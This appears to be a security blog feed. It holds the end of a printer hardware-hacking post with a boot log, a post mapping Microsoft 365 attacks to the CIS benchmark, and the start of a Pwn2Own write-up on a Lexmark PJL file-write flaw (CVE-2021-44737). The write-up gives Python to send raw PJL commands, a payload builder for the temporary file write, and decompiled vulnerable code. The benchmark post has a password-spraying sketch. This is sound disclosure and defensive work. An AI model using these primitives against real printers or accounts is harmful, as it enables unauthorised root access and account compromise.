Select Vsense0 = 0
a
Calling Configure_Flashes @ 0xFFE010A8 12 FE 13 E0026800
fves
DDR3 400MHz 1x16 4Gbit
rSHA compare Passed 0
SHA compare Passed 0
l
Launch AP Core0 @ 0x00100000
U-Boot 2018.07-AUTOINC+761a3261e9 (Jun 08 2021 - 20:32:14 +0000)
DRAM: 512 MiB
NAND: 256 MiB
MMC: mv_sdh: 0, mv_sdh: 1, mv_sdh: 2
lxk_gen2_eeprom_probe:123: No panel eeprom option found.
lxk_panel_notouch_probe_gen2:283: panel uicc type 68, hw vers 19, panel id 98, display type 11, firmware v4.5, lvds 4
found smpn display TM024HDH49 / ILI9341 default
lcd_lvds_pll_init: Requesting dotclk=40000000Hz
found smpn display Yeebo 2.8 B
ubi0: default fastmap pool size: 100
ubi0: default fastmap WL pool size: 50
ubi0: attaching mtd1
ubi0: attached by fastmap
ubi0: fastmap pool size: 100
ubi0: fastmap WL pool size: 50
ubi0: attached mtd1 (name "mtd=1", size 253 MiB)
ubi0: PEB size: 131072 bytes (128 KiB), LEB size: 126976 bytes
ubi0: min./max. I/O unit sizes: 2048/2048, sub-page size 2048
ubi0: VID header offset: 2048 (aligned 2048), data offset: 4096
ubi0: good PEBs: 2018, bad PEBs: 8, corrupted PEBs: 0
ubi0: user volume: 7, internal volumes: 1, max. volumes count: 128
ubi0: max/mean erase counter: 4/2, WL threshold: 4096, image sequence number: 0
ubi0: available PEBs: 0, total reserved PEBs: 2018, PEBs reserved for bad PEB handling: 32
Loading file '/shared/pm/softoff' to addr 0x1f6545d4...
Unmounting UBIFS volume InternalStorage!
Card did not respond to voltage select!
bootcmd: setenv cramfsaddr 0x1e800000;ubi read 0x1e800000 Kernel 0xb63208;sha256verify 0x1e800000 0x1f363000 1;cramfsload 0x100000 /main.img;source 0x100000;loop.l 0xd0000000 1
Read 11940360 bytes from volume Kernel to 1e800000
Code authentication success
### CRAMFS load complete: 2165 bytes loaded to 0x100000
## Executing script at 00100000
### CRAMFS load complete: 4773552 bytes loaded to 0xa00000
### CRAMFS load complete: 5123782 bytes loaded to 0x1600000
## Booting kernel from Legacy Image at 00a00000 ...
Image Name: Linux-4.17.19-yocto-standard-2f4
Image Type: ARM Linux Kernel Image (uncompressed)
Data Size: 4773488 Bytes = 4.6 MiB
Load Address: 00008000
Entry Point: 00008000
## Loading init Ramdisk from Legacy Image at 01600000 ...
Image Name: initramfs-image-granite2-2021061
Image Type: ARM Linux RAMDisk Image (uncompressed)
Data Size: 5123718 Bytes = 4.9 MiB
Load Address: 00000000
Entry Point: 00000000
## Flattened Device Tree blob at 01500000
Booting using the fdt blob at 0x1500000
Loading Kernel Image ... OK
Using Device Tree in place at 01500000, end 01516b28
UPDATING DEVICE TREE WITH st:1fec4000 sz: 12c000
Starting kernel ...
Booting Linux on physical CPU 0xffff00
Linux version 4.17.19-yocto-standard-2f4d6903b333a60c46f1f33da4b122d1 (<user>@<host>) (gcc version 7.3.0 (GCC)) #1 SMP PREEMPT Thu Jun 10 20:19:42 UTC 2021
CPU: ARMv7 Processor [410fd034] revision 4 (ARMv7), cr=30c5383d
CPU: div instructions available: patching division code
CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
OF: fdt: Machine model: mv6220 Lionfish 00d L
earlycon: early_pxa0 at MMIO32 0x00000000d4030000 (options '')
bootconsole [early_pxa0] enabled
FIX ignoring exception 0xa11 addr=a7ff7dfe swapper/0:1
starting version 237
mount: mounting /dev/active-partitions/Base on /newrootfs failed: No such file or directory
Unknown device, --name=, --path=, or absolute path in /dev/ or /sys expected.
mount: mounting /dev/active-partitions/Base on /newrootfs failed: No such file or directory
mount: mounting /dev/active-partitions/Base on /newrootfs failed: No such file or directory
mount: mounting /dev on /newrootfs/dev failed: No such file or directory
mount: mounting /tmp on /newrootfs/var failed: No such file or directory
ln: /newrootfs/var/dev: No such file or directory
BusyBox v1.27.2 (2021-03-11 21:59:45 UTC) multi-call binary.
Usage: switch_root [-c /dev/console] NEW_ROOT NEW_INIT [ARGS]
Free initramfs and switch to another root fs:
chroot to NEW_ROOT, delete all in /, move NEW_ROOT to /,
execute NEW_INIT. PID must be 1. NEW_ROOT must be a mountpoint.
-c DEV Reopen stdio to DEV after switch
Kernel panic - not syncing: Attempted to kill init! exitcode=0x00000100
CPU: 1 PID: 1 Comm: switch_root Tainted: P O 4.17.19-yocto-standard-2f4d6903b333a60c46f1f33da4b122d1 #1
Hardware name: Marvell Pegmatite (Device Tree)
[<c001b3fc>] (unwind_backtrace) from [<c0015b7c>] (show_stack+0x20/0x24)
[<c0015b7c>] (show_stack) from [<c0637468>] (dump_stack+0x78/0x94)
[<c0637468>] (dump_stack) from [<c002f238>] (panic+0xe8/0x27c)
[<c002f238>] (panic) from [<c0034314>] (do_exit+0x61c/0xa6c)
[<c0034314>] (do_exit) from [<c0034818>] (do_group_exit+0x68/0xd0)
[<c0034818>] (do_group_exit) from [<c00348a0>] (__wake_up_parent+0x0/0x30)
[<c00348a0>] (__wake_up_parent) from [<c0009000>] (ret_fast_syscall+0x0/0x50)
Exception stack(0xd2e2dfa8 to 0xd2e2dff0)
dfa0: 480faba0 480faba0 00000001 00000000 00000001 00000001
dfc0: 480faba0 480faba0 00000000 000000f8 00000001 00000000 480ff780 480fc4d0
dfe0: 47faf908 beaa2b74 47fee90c 4805aac4
pegmatite_wdt: set TTCR: 15000
pegmatite_wdt: set APS_TMR_WMR: 6912
CPU0: stopping
CPU: 0 PID: 0 Comm: swapper/0 Tainted: P O 4.17.19-yocto-standard-2f4d6903b333a60c46f1f33da4b122d1 #1
Hardware name: Marvell Pegmatite (Device Tree)
[<c001b3fc>] (unwind_backtrace) from [<c0015b7c>] (show_stack+0x20/0x24)
[<c0015b7c>] (show_stack) from [<c0637468>] (dump_stack+0x78/0x94)
[<c0637468>] (dump_stack) from [<c001913c>] (handle_IPI+0x230/0x338)
[<c001913c>] (handle_IPI) from [<c000a218>] (gic_handle_irq+0xe4/0xfc)
[<c000a218>] (gic_handle_irq) from [<c00099f8>] (__irq_svc+0x58/0x8c)
Exception stack(0xc0999e68 to 0xc0999eb0)
9e60: 00000000 c09f70a4 00000001 00000050 c09f70a4 c09f6f14
9e80: 00000005 c0a09cb4 dfe16598 00000005 00000005 c0999f04 c0999eb8 c0999eb8
9ea0: c0503684 c0503690 60000113 ffffffff
[<c00099f8>] (__irq_svc) from [<c0503690>] (cpuidle_enter_state+0x2bc/0x3a8)
[<c0503690>] (cpuidle_enter_state) from [<c05037f0>] (cpuidle_enter+0x48/0x4c)
[<c05037f0>] (cpuidle_enter) from [<c005f0e4>] (call_cpuidle+0x44/0x48)
[<c005f0e4>] (call_cpuidle) from [<c005f4a0>] (do_idle+0x1e0/0x270)
[<c005f4a0>] (do_idle) from [<c005f7f8>] (cpu_startup_entry+0x28/0x30)
[<c005f7f8>] (cpu_startup_entry) from [<c064bd54>] (rest_init+0xc0/0xe0)
[<c064bd54>] (rest_init) from [<c0913f40>] (start_kernel+0x418/0x4bc)
---[ end Kernel panic - not syncing: Attempted to kill init! exitcode=0x00000100 ]---

Signal integrity was a concern due to the cable length, so we tried a shorter cable, unfortunately with the same results.

At this point the return on investment for the time spent was low, so we decided to invest the time in reversing the binaries instead. This turned out to be a good decision, as we will see in the second part of this blog, coming soon.

Shaking The Foundation of An Online Collaboration Tool: Microsoft 365 Top 5 Attacks vs the CIS Microsoft 365 Foundation Benchmark

By: Viktor Gazdag

As one of the proud contributors to the Center for Internet Security (CIS) Microsoft 365 Foundation Benchmark, I wanted to raise awareness about the new version released on February 17th, and how it can help a company establish a secure baseline for their Microsoft 365 tenant.

The first CIS Microsoft 365 Foundation Benchmark was released back in December 2018. Version v1.4.0 has now been released; quoting from the guide, it “provides prescriptive guidance for establishing a secure configuration posture for Microsoft 365 Cloud offerings running on any OS. This guide was tested against Microsoft 365, and includes recommendations for Exchange Online, SharePoint Online, OneDrive for Business, Skype/Teams, Azure Active Directory, and Intune.” [1]

About the Benchmark

This is a community-driven benchmark that collects input from contributors across different industry sectors and is based on mutual consensus regarding the issues. In practice, this means discussing new and old recommendations at a biweekly meeting or in the online forum via tickets and discussions, proofreading, and more.

There are seven sections, namely:

  1. Account/Authentication
  2. Application Permissions
  3. Data Management
  4. Email Security/Exchange Online
  5. Auditing
  6. Storage
  7. Mobile Device Management

The recommendations in these sections are grouped into four profiles, based on licensing, security level and effect.

The document follows a nice structure similar to a penetration test report: title, applicability, description, rationale, impact, audit, remediation, default value and CIS control mapping.

Wherever it is possible for a recommendation to be checked in an automated way, the audit and remediation sections include instructions for doing so.

At the end of the document, there is a checklist summary table for helping to track each recommendation outcome.

Top 5 Attacks on Microsoft 365 vs CIS Microsoft 365 Foundation Benchmark

Below I’ve shared 5 of the most common ways I’ve seen Microsoft 365 tenants compromised in real-world environments, as well as the corresponding CIS benchmarks that can help prevent these specific weaknesses. The attacks considered below are spamming, phishing, password attacks, malicious apps and data exfiltration.

Let’s see now if the foundation benchmark is effective in preventing these Top 5 attacks.

1. Spamming

“Spamming is the use of messaging systems to send multiple unsolicited messages (spam) to large numbers of recipients for the purpose of commercial advertising, for the purpose of non-commercial proselytizing, for any prohibited purpose (especially the fraudulent purpose of phishing), or simply sending the same message over and over to the same user.” [4]

“Microsoft processes more than 400 billion emails each month and blocks 10 million spam and malicious email messages every minute to help protect our customers from malicious emails.” [3]

The CIS Benchmark has the following recommendations against spam:

  • 2.4 Ensure Safe Attachments for SharePoint, OneDrive, and Microsoft Teams is Enabled
  • 4.2 Ensure Exchange Online Spam Policies are set correctly
  • 5.13 Ensure Microsoft Defender for Cloud Apps is Enabled
  • 5.14 Ensure the report of users who have had their email privileges restricted due to spamming is reviewed

2. Phishing

“Phishing is when attackers attempt to trick users into doing ‘the wrong thing’, such as clicking a bad link that will download malware, or direct them to a dodgy website.” [5]

“Microsoft Defender for Office 365 blocked more than 35.7 billion phishing and other malicious e-mails targeting enterprise and consumer customers, between January and December 2021.” [2]

The CIS Benchmark has the following recommendations against phishing:

  • 2.3 Ensure Defender for Office Safe Links for Office Applications is Enabled
  • 2.10 Ensure internal phishing protection for Forms is enabled
  • 4.7 Ensure that an anti-phishing policy has been created
  • 4.5 Ensure the Safe Links policy is enabled
  • 5.12 Ensure the spoofed domains report is reviewed weekly
  • 5.13 Ensure Microsoft Defender for Cloud Apps is Enabled

3. Password Brute-Force and Password Spraying

These two types of password attacks differ in volume and order. Brute-forcing a given user’s password generates a lot of “noise”, as an attacker may try millions of passwords from a wordlist against one user before moving to a different user. Password spraying is a type of brute-force attack that tries a common password against all users, followed by at most a couple more passwords, with delays between each new password attempt to avoid account lockouts. The sketch below illustrates the difference.
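
The distinction is essentially the loop order, as this illustrative Python sketch shows (try_login, users and the password lists are placeholders, not a real API):

import time

def brute_force(users, wordlist, try_login):
    for user in users:
        for password in wordlist:       # noisy: many attempts per account
            try_login(user, password)

def password_spray(users, common_passwords, try_login, delay):
    for password in common_passwords:   # few passwords, many accounts
        for user in users:
            try_login(user, password)
        time.sleep(delay)               # stay under lockout thresholds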

“Microsoft (Azure Active Directory) detected and blocked more than 25.6 billion attempts to hijack enterprise customer accounts by brute-forcing stolen passwords, between January and December 2021.” [2]

“Microsoft says MFA adoption remains low, only 22% among Azure AD enterprise customers” [6]

The CIS Benchmark has the following recommendations against brute-force and password spraying:

  • 1.1.1 Ensure multifactor authentication is enabled for all users in administrative roles
  • 1.1.2 Ensure multifactor authentication is enabled for all users in all roles
  • 1.1.5 Ensure that password protection is enabled for Active Directory
  • 1.1.6 Enable Conditional Access policies to block legacy authentication
  • 1.1.8 Enable Azure AD Identity Protection sign-in risk policies
  • 1.1.9 Enable Azure AD Identity Protection user risk policies
  • 1.1.7 Ensure that password hash sync is enabled for resiliency and leaked credential detection
  • 1.1.10 Use Just In Time privileged access to Office 365 roles
  • 5.3 Ensure the Azure AD ‘Risky sign-ins’ report is reviewed at least weekly
  • 5.13 Ensure Microsoft Defender for Cloud Apps is Enabled

4. Malicious Apps

“The Azure Active Directory (Azure AD) application gallery is a collection of software as a service (SaaS) applications that have been pre-integrated with Azure AD.” [7] These SaaS web applications can help automate tasks and extend the functionality of Microsoft 365 services, but there are also add-ons for on-premises Office 365 applications.

The CIS Benchmark has the following recommendations against malicious apps and add-ons:

  • 2.1 Ensure third party integrated applications are not allowed
  • 2.6 Ensure user consent to apps accessing company data on their behalf is not allowed
  • 2.7 Ensure the admin consent workflow is enabled
  • 2.8 Ensure users installing Outlook add-ins is not allowed
  • 2.9 Ensure users installing Word, Excel, and PowerPoint add-ins is not allowed
  • 5.4 Ensure the Application Usage report is reviewed at least weekly
  • 5.13 Ensure Microsoft Defender for Cloud Apps is Enabled

5. Data Exfiltration via Automatic Email Forwarding

Attackers often use built-in functionality to move data out from user mailboxes, and one of the most popular methods is automatic email forwarding rules.

The CIS Benchmark has the following recommendations against automatic email forwarding:

  • 4.3 Ensure all forms of mail forwarding are blocked and/or disabled
  • 4.4 Ensure mail transport rules do not whitelist specific domains
  • 5.7 Ensure mail forwarding rules are reviewed at least weekly
  • 5.13 Ensure Microsoft Defender for Cloud Apps is Enabled

Conclusions

As you have seen from this post, the newest CIS Microsoft 365 Foundation Benchmark can not only identify weak points in your tenant’s security, but also offer concrete recommendations to introduce specific mitigations against the most high-impact threats to your Microsoft 365 environment.

References

[1] CIS Microsoft 365 Foundation Benchmark: https://www.cisecurity.org/benchmark/microsoft_365

[2] Microsoft Cyber-Signals: https://news.microsoft.com/wp-content/uploads/prod/sites/626/2022/02/Cyber-Signals-E-1.pdf

[3] Office 365 helps secure Microsoft from modern phishing campaigns: https://www.microsoft.com/en-us/insidetrack/office-365-helps-secure-microsoft-from-modern-phishing-campaigns

[4] Wikipedia Spamming: https://en.wikipedia.org/wiki/Spamming

[5] NCSC: Phishing attacks: defending your organisation: https://www.ncsc.gov.uk/guidance/phishing

[6] Azure AD MFA Adoption tweet: https://twitter.com/campuscodi/status/1489647070466170883

[7] Overview of the Azure Active Directory application gallery: https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/overview-application-gallery

Analyzing a PJL directory traversal vulnerability – exploiting the Lexmark MC3224i printer (part 2)

By: Cedric Halbronn

Summary

This blog post describes a vulnerability found and exploited in October 2021 by Alex Plaskett, Cedric Halbronn, and Aaron Adams, working in the Exploit Development Group (EDG) of NCC Group. We successfully exploited it at the Pwn2Own 2021 competition in November 2021. Lexmark published a public patch and their advisory in January 2022, together with the ZDI advisory. The vulnerability is now known as CVE-2021-44737.

We decided to target the Lexmark MC3224i printer. However, it seemed to be out of stock everywhere, so we bought a Lexmark MC3224dwe printer instead. The main difference seems to be that the Lexmark MC3224i model has additional fax features whereas the Lexmark MC3224dwe model does not. From an analysis point of view, this means there may be a few differences, and most probably we would not be able to target some features. We downloaded the firmware updates for both models and they were exactly the same, so we decided to pursue, since we didn’t have a choice anyway 🙂

As per Pwn2Own requirements the vulnerability can be exploited remotely, does not need authentication, and exists in the default configuration. It allows an attacker to get remote code execution as the root user on the printer. The Lexmark advisory indicates all the affected Lexmark models.

The following steps describe the exploitation process:

  1. A temporary file write vulnerability (CVE-2021-44737) is used to write an ABRT hook file
  2. We remotely crash a process in order to trigger the ABRT abort handling
  3. The abort handling ends up executing bash commands from our ABRT hook file

The temporary file write vulnerability is in the "Lexmark-specific" hydra service (/usr/bin/hydra), running by default on the Lexmark MC3224dwe printer. hydra is a pretty big binary and handles many protocols. The vulnerability is in the Printer Job Language (PJL) commands and more specifically in an undocumented command named LDLWELCOMESCREEN.

We have analysed and exploited the vulnerability on the CXLBL.075.272/CXLBL.075.281 versions, but older versions are likely vulnerable too. We detail our analysis of CXLBL.075.272 in this blog post, since CXLBL.075.281 was only released mid-October and we had already been working on the former.

Note: The Lexmark MC3224dwe printer is based on the ARM (32-bit) architecture, but it didn’t matter for exploitation, just for reversing.

We named our exploit "MissionAbrt" due to triggering an ABRT but then aborting the ABRT.

You said "Reverse Engineering"?

The Lexmark firmware update files that you can download from the Lexmark download page are encrypted. If you are interested in how our colleague Catalin Visinescu managed to get access to the firmware files using hardware attacks, please refer to the first installment of our blog series.

Vulnerability details

Background

As Wikipedia says:

Printer Job Language (PJL) is a method developed by Hewlett-Packard for switching printer languages at the job level, and for status readback between the printer and the host computer. PJL adds job level controls, such as printer language switching, job separation, environment, status readback, device attendance and file system commands.

PJL commands look like the following:

@PJL SET PAPER=A4
@PJL SET COPIES=10
@PJL ENTER LANGUAGE=POSTSCRIPT

PJL is known to be useful for attackers. In the past, some printers had vulnerabilities allowing attackers to read or write files on the device.

PRET is a tool for speaking PJL (among other languages) to several printer brands, but it does not necessarily support all of their commands, since each vendor supports its own proprietary commands.
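
For illustration, talking PJL to a printer usually only requires a raw TCP connection to the standard JetDirect port 9100 (a minimal Python sketch; the port and the response handling are our assumptions for this device, and PRET automates the same idea):

import socket

UEL = b"\x1b%-12345X"  # Universal Exit Language sequence bracketing a PJL job

def send_pjl(host: str, commands: bytes, port: int = 9100) -> bytes:
    s = socket.create_connection((host, port), timeout=5)
    try:
        s.sendall(UEL + b"@PJL\r\n" + commands + UEL)
        return s.recv(4096)  # e.g. the response to "@PJL INFO ID"
    except socket.timeout:
        return b""
    finally:
        s.close()

print(send_pjl("192.168.1.4", b"@PJL INFO ID\r\n"))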

Reaching the vulnerable function

The hydra binary does not have symbols but has a lot of logging/error functions which contain some function names. The code shown below is decompiled code from IDA/Hex-Rays as no open source has been found for this binary. Lots of PJL commands are registered by setup_pjl_commands() at address 0xFE17C. We are interested in the LDLWELCOMESCREEN PJL command, which seems proprietary to Lexmark and undocumented.

int __fastcall setup_pjl_commands(int a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
pjl_ctx = create_pjl_ctx(a1);
pjl_set_datastall_timeout(pjl_ctx, 5);
sub_11981C();
pjlpGrowCommandHandler("UEL", pjl_handle_uel);
...
pjlpGrowCommandHandler("LDLWELCOMESCREEN", pjl_handle_ldlwelcomescreen);
...

When a PJL LDLWELCOMESCREEN command is received, the pjl_handle_ldlwelcomescreen() at 0x1012F0 starts handling it. We see this command takes a string representing a filename as a first argument:

int __fastcall pjl_handle_ldlwelcomescreen(char *client_cmd)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
result = pjl_check_args(client_cmd, "FILE", "PJL_STRING_TYPE", "PJL_REQ_PARAMETER", 0);
if ( result <= 0 )
return result;
filename = (const char *)pjl_parse_arg(client_cmd, "FILE", 0);
return pjl_handle_ldlwelcomescreen_internal(filename);
}

Then, the pjl_handle_ldlwelcomescreen_internal() function at 0x10A200 opens that file. Note that if the file already exists, it won’t open it and returns immediately. Consequently, we can only write files that do not exist yet. Furthermore, the complete directory hierarchy has to already exist in order for us to create the file, and we also need permissions to write to that location.

unsigned int __fastcall pjl_handle_ldlwelcomescreen_internal(const char *filename)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
if ( !filename )
return 0xFFFFFFFF;
fd = open(filename, 0xC1, 0777); // open(filename,O_WRONLY|O_CREAT|O_EXCL, 0777)
if ( fd == 0xFFFFFFFF )
return 0xFFFFFFFF;
ret = pjl_ldwelcomescreen_internal2(0, 1, pjl_getc_, write_to_file_, &fd);// goes here
if ( !ret && pjl_unk_function && pjl_unk_function(filename) )
pjl_process_ustatus_device_(20001);
close(fd);
remove(filename);
return ret;
}

We will analyse pjl_ldwelcomescreen_internal2() below, but please note above that the file is closed at the end and then deleted entirely with the remove() call. This means we can only write that file temporarily.

Understanding the file write

Now let’s analyse the pjl_ldwelcomescreen_internal2() function at 0x115470. It will end up calling pjl_ldwelcomescreen_internal3() due to flag == 0 being passed by pjl_handle_ldlwelcomescreen_internal().

unsigned int __fastcall pjl_ldwelcomescreen_internal2(
int flag,
int one,
int (__fastcall *pjl_getc)(unsigned __int8 *p_char),
ssize_t (__fastcall *write_to_file)(int *p_fd, char *data_to_write, size_t len_to_write),
int *p_fd)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
bad_arg = write_to_file == 0;
if ( write_to_file )
bad_arg = pjl_getc == 0;
if ( bad_arg )
return 0xFFFFFFFF;
if ( flag )
return pjl_ldwelcomescreen_internal3bis(flag, one, pjl_getc, write_to_file, p_fd);
return pjl_ldwelcomescreen_internal3(one, pjl_getc, write_to_file, p_fd);// goes here due to flag == 0
}

We spent some time reversing the pjl_ldwelcomescreen_internal3() function at 0x114838 to understand its internals. This function is quite big and its decompiled source code, shown below, is hardly readable, but the logic is still easy to understand.

Basically this function is responsible for reading additional data from the client and for writing it to the previously opened file.

The client data seems to be received asynchronously by another thread and saved into separate allocations within a pjl_ctx structure. Hence, the pjl_ldwelcomescreen_internal3() function reads one character at a time from that pjl_ctx structure and fills a 0x400-byte stack buffer.

  1. If 0x400 bytes have been received and the stack buffer is full, it ends up writing these 0x400 bytes into the previously opened file. Then, it resets that stack buffer and starts reading more data to repeat that process.
  2. If the PJL command’s footer ("@PJL END DATA") is received, it discards that footer part, then it writes the accumulated received data (of size < 0x400 bytes) to the file, and exits.
unsigned int __fastcall pjl_ldwelcomescreen_internal3(
int was_last_write_success,
int (__fastcall *pjl_getc)(unsigned __int8 *p_char),
ssize_t (__fastcall *write_to_file)(int *p_fd, char *data_to_write, size_t len_to_write),
int *p_fd)
{
unsigned int current_char_2; // r5
size_t len_to_write; // r4
int len_end_data; // r11
int has_encountered_at_sign; // r6
unsigned int current_char_3; // r0
int ret; // r0
int current_char_1; // r3
ssize_t len_written; // r0
unsigned int ret_2; // r3
ssize_t len_written_1; // r0
unsigned int ret_3; // r3
ssize_t len_written_2; // r0
unsigned int ret_4; // r3
int was_last_write_success_1; // r3
size_t len_to_write_final; // r4
ssize_t len_written_final; // r0
unsigned int ret_5; // r3
unsigned int ret_1; // [sp+0h] [bp-20h]
unsigned __int8 current_char; // [sp+1Fh] [bp-1h] BYREF
_BYTE data_to_write[1028]; // [sp+20h] [bp+0h] BYREF
current_char_2 = 0xFFFFFFFF;
ret_1 = 0;
b_restart_from_scratch:
len_to_write = 0;
memset(data_to_write, 0, 0x401u);
len_end_data = 0;
has_encountered_at_sign = 0;
current_char_3 = current_char_2;
while ( 1 )
{
current_char = 0;
if ( current_char_3 == 0xFFFFFFFF )
{
// get one character from pjl_ctx->pData
ret = pjl_getc(&current_char);
current_char_1 = current_char;
}
else
{
// a previous character was already retrieved, let's use that for now
current_char_1 = (unsigned __int8)current_char_3;
ret = 1; // success
current_char = current_char_1;
}
if ( has_encountered_at_sign )
break; // exit the loop forever
// is it an '@' sign for a PJL-specific command?
if ( current_char_1 != '@' )
goto b_read_pjl_data;
len_end_data = 1;
has_encountered_at_sign = 1;
b_handle_pjl_at_sign:
// from here, current_char == '@'
if ( len_to_write + 13 > 0x400 ) // ?
{
if ( was_last_write_success )
{
len_written = write_to_file(p_fd, data_to_write, len_to_write);
was_last_write_success = len_to_write == len_written;
current_char_2 = '@';
ret_2 = ret_1;
if ( len_to_write != len_written )
ret_2 = 0xFFFFFFFF;
ret_1 = ret_2;
}
else
{
current_char_2 = '@';
}
goto b_restart_from_scratch;
}
b_read_pjl_data:
if ( ret == 0xFFFFFFFF ) // error
{
if ( !was_last_write_success )
return ret_1;
len_written_1 = write_to_file(p_fd, data_to_write, len_to_write);
ret_3 = ret_1;
if ( len_to_write != len_written_1 )
return 0xFFFFFFFF; // error
return ret_3;
}
if ( len_to_write > 0x400 )
__und(0);
// append data to stack buffer
data_to_write[len_to_write++] = current_char_1;
current_char_3 = 0xFFFFFFFF; // reset to enforce reading another character
// at next loop iteration
// reached 0x400 bytes to write, let's write them
if ( len_to_write == 0x400 )
{
current_char_2 = 0xFFFFFFFF; // reset to enforce reading another character
// at next loop iteration
if ( was_last_write_success )
{
len_written_2 = write_to_file(p_fd, data_to_write, 0x400);
ret_4 = ret_1;
if ( len_written_2 != 0x400 )
ret_4 = 0xFFFFFFFF;
ret_1 = ret_4;
was_last_write_success_1 = was_last_write_success;
if ( len_written_2 != 0x400 )
was_last_write_success_1 = 0;
was_last_write_success = was_last_write_success_1;
}
goto b_restart_from_scratch;
}
} // end of while ( 1 )
// we reach here if we encountered an '@' sign
// let's check it is a valid "@PJL END DATA" footer
if ( (unsigned __int8)aPjlEndData[len_end_data] != current_char_1 )
{
len_end_data = 1;
has_encountered_at_sign = 0; // reset so we read it again?
goto b_read_data_or_at;
}
if ( len_end_data != 12 ) // len("PJL END DATA") = 12
{
++len_end_data;
b_read_data_or_at:
// will go back to the while(1) loop but exit at the next
// iteration due to "break" and has_encountered_at_sign == 1
if ( current_char_1 != '@' )
goto b_read_pjl_data;
goto b_handle_pjl_at_sign;
}
// we reach here if all "PJL END DATA" was parsed
current_char = 0;
pjl_getc(&current_char); // read '\r'
if ( current_char == '\r' )
pjl_getc(&current_char); // read '\n'
// write all the remaining data (len < 0x400), except the "PJL END DATA" footer
len_to_write_final = len_to_write - 0xC;
if ( !was_last_write_success )
return ret_1;
len_written_final = write_to_file(p_fd, data_to_write, len_to_write_final);
ret_5 = ret_1;
if ( len_to_write_final != len_written_final )
return 0xFFFFFFFF;
return ret_5;
}

The pjl_getc() function at 0xFEA18 allows to retrieve one character from the pjl_ctx structure:

int __fastcall pjl_getc(_BYTE *ppOut)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
pjl_ctx = get_pjl_ctx();
*ppOut = 0;
InputDataBufferSize = pjlContextGetInputDataBufferSize(pjl_ctx);
if ( InputDataBufferSize == pjl_get_end_of_file(pjl_ctx) )
{
pjl_set_eoj(pjl_ctx, 0);
pjl_set_InputDataBufferSize(pjl_ctx, 0);
pjl_get_data((int)pjl_ctx);
if ( pjl_get_state(pjl_ctx) == 1 )
return 0xFFFFFFFF; // error
if ( !pjlContextGetInputDataBufferSize(pjl_ctx) )
_assert_fail(
"pjlContextGetInputDataBufferSize(pjlContext) != 0",
"/usr/src/debug/jobsystem/git-r0/git/jobcontrol/pjl/pjl.c",
0x1BBu,
"pjl_getc");
}
current_char = pjl_getc_internal(pjl_ctx);
ret = 1;
*ppOut = current_char;
return ret;
}

The write_to_file() function at 0x6595C simply writes data to the specified file descriptor:

int __fastcall write_to_file(void *data_to_write, size_t len_to_write, int fd)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
total_written = 0;
do
{
while ( 1 )
{
len_written = write(fd, data_to_write, len_to_write);
len_written_1 = len_written;
if ( len_written < 0 )
break;
if ( !len_written )
goto b_error;
data_to_write = (char *)data_to_write + len_written;
total_written += len_written;
len_to_write -= len_written;
if ( !len_to_write )
return total_written;
}
}
while ( *_errno_location() == EINTR );
b_error:
printf("%s:%d [%s] rc = %d\n", "../git/hydra/flash/flashfile.c", 0x153, "write_to_file", len_written_1);
return 0xFFFFFFFF;
}

From an exploitation perspective, what is interesting is that if we send more than 0x400 bytes, they will be written to that file, and if we refrain from sending the PJL command’s footer, it will wait for us to send more data before it actually deletes the file entirely.

Note: When sending data, we generally want to send padding data to make sure it reaches a multiple of 0x400 so our controlled data is actually written to the file.
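
Based on this behaviour, a payload for the temporary file write can be sketched as follows (the exact wire format is our interpretation of the decompiled code; note the deliberately missing footer that keeps the file alive):

def build_payload(path: str, content: bytes) -> bytes:
    cmd = b'@PJL LDLWELCOMESCREEN FILE="%s"\r\n' % path.encode()
    # Pad to a multiple of 0x400 so the last chunk of controlled data is
    # actually flushed to the file
    padded = content + b" " * (-len(content) % 0x400)
    # No "@PJL END DATA" footer: hydra keeps waiting for more data instead
    # of deleting the file
    return cmd + padded

payload = build_payload("/var/fs/shared/eventlog/logs/debug.log.1", b"A" * 100)

Such a payload would be sent over the same raw port 9100 channel shown earlier.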

Confirming the temporary file write

There are several CGI scripts showing the content of files on the filesystem. For instance, /usr/share/web/cgi-bin/eventlogdebug_se's content is:

#!/bin/ash
echo "Expires: Sun, 27 Feb 1972 08:00:00 GMT"
echo "Pragma: no-cache"
echo "Cache-Control: no-cache"
echo "Content-Type: text/html"
echo
echo "<HTML><HEAD><META HTTP-EQUIV=\"Content-type\" CONTENT=\"text/html; charset=UTF-8\"></HEAD><BODY><PRE>"
echo "[++++++++++++++++++++++ Advanced EventLog (AEL) Retrieved Reports ++++++++++++++++++++++]"
for i in 9 8 7 6 5 4 3 2 1 0; do
if [ -e /var/fs/shared/eventlog/logs/debug.log.$i ] ; then
cat /var/fs/shared/eventlog/logs/debug.log.$i
fi
done
echo "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"
echo ""
echo ""
echo "[++++++++++++++++++++++ Advanced EventLog (AEL) Configurations ++++++++++++++++++++++]"
rob call applications.eventlog getAELConfiguration n
echo "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"
echo "</PRE></BODY></HTML>"

Consequently, we write the /var/fs/shared/eventlog/logs/debug.log.1 file, filled with lots of 'A' characters, using the previously discussed temporary file write primitive.

We confirm the file is successfully written by accessing the CGI page.

From testing, we noticed that the file would be automatically deleted after between 1min and 1min40s, probably due to a timeout in the PJL handling in hydra. This means we can safely use the temporary file primitive for 60 seconds.

Exploitation

Exploiting the crash event handler aka ABRT

We spent quite some time trying to find a way to execute code. We caught a break when we noticed several configuration files that define what to do when a crash occurs:

$ ls ./squashfs-root/etc/libreport/events.d
abrt_dbus_event.conf      emergencyanalysis_event.conf  rhtsupport_event.conf  vimrc_event.conf
ccpp_event.conf           gconf_event.conf              smart_event.conf       vmcore_event.conf
centos_report_event.conf  koops_event.conf              svcerrd.conf
